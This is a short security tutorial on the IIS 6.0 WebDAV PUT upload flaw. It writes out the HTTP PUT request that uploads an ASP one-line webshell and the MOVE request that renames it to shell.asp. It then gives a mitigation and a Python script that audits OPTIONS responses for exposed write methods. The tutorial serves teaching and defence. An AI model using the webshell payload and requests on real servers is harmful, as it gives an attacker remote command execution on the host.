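Common web middleware includes IIS, Apache, Tomcat, Nginx, JBoss, WebLogic and WebSphere. Misconfiguration of any of them can also introduce vulnerabilities; below are a few common container vulnerabilities.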
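IIS 6.0 PUT upload

The IIS server has WebDAV enabled under Web Service Extensions and write permission is configured, which results in arbitrary file upload. Use Burp Suite to submit an OPTIONS request and see which methods the server supports.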
Use PUT to write a one-line webshell. A script file cannot be written directly, so first write a .txt file and then rename it to an .asp file with the MOVE method.

PUT /test.txt HTTP/1.1
Host: upload.moonteam.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 27

<%eval request("cmd")%>

The file is written successfully.

MOVE /test.txt HTTP/1.1
Host: upload.moonteam.com
Destination: http://upload.moonteam.com/shell.asp

Mitigation: disable WebDAV and remove write permission.
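
A check for the mitigation above, as an added example that is not part of the original post: it parses the headers returned by an OPTIONS request to your own server and reports whether WebDAV and the PUT/MOVE pair are still advertised. The function names and both sample responses are constructed for illustration.

```python
# Added example: audit a raw OPTIONS response for WebDAV write exposure.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH", "LOCK"}

def parse_headers(raw):
    """Return (status_code, {lower-cased header name: [values]}) from a raw response."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers

def methods_in(headers, name):
    """Collect the comma-separated method tokens of one header, upper-cased."""
    return {m.strip().upper() for v in headers.get(name, []) for m in v.split(",") if m.strip()}

def audit_options(raw):
    status, headers = parse_headers(raw)
    allow = methods_in(headers, "allow")  # methods offered for the requested URL
    dav = bool(headers.get("dav")) or bool(headers.get("ms-author-via"))
    return {
        "status": status,
        "webdav_advertised": dav,
        "write_methods_allowed": sorted(allow & WRITE_METHODS),
        # PUT plus MOVE is the pair the upload described above depends on.
        "put_then_move_possible": {"PUT", "MOVE"} <= allow,
    }

# Constructed sample responses (not captured from a real host).
BEFORE = (
    "HTTP/1.1 200 OK\r\n"
    "DAV: 1, 2\r\n"
    "MS-Author-Via: DAV\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\r\n"
    "Content-Length: 0\r\n\r\n"
)
AFTER = (
    "HTTP/1.1 200 OK\r\n"
    "allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for label, raw in (("before", BEFORE), ("after", AFTER)):
        print(label, audit_options(raw))
```

A clean result only shows that the methods are no longer advertised; the write permission on the directory still has to be confirmed in the IIS configuration itself.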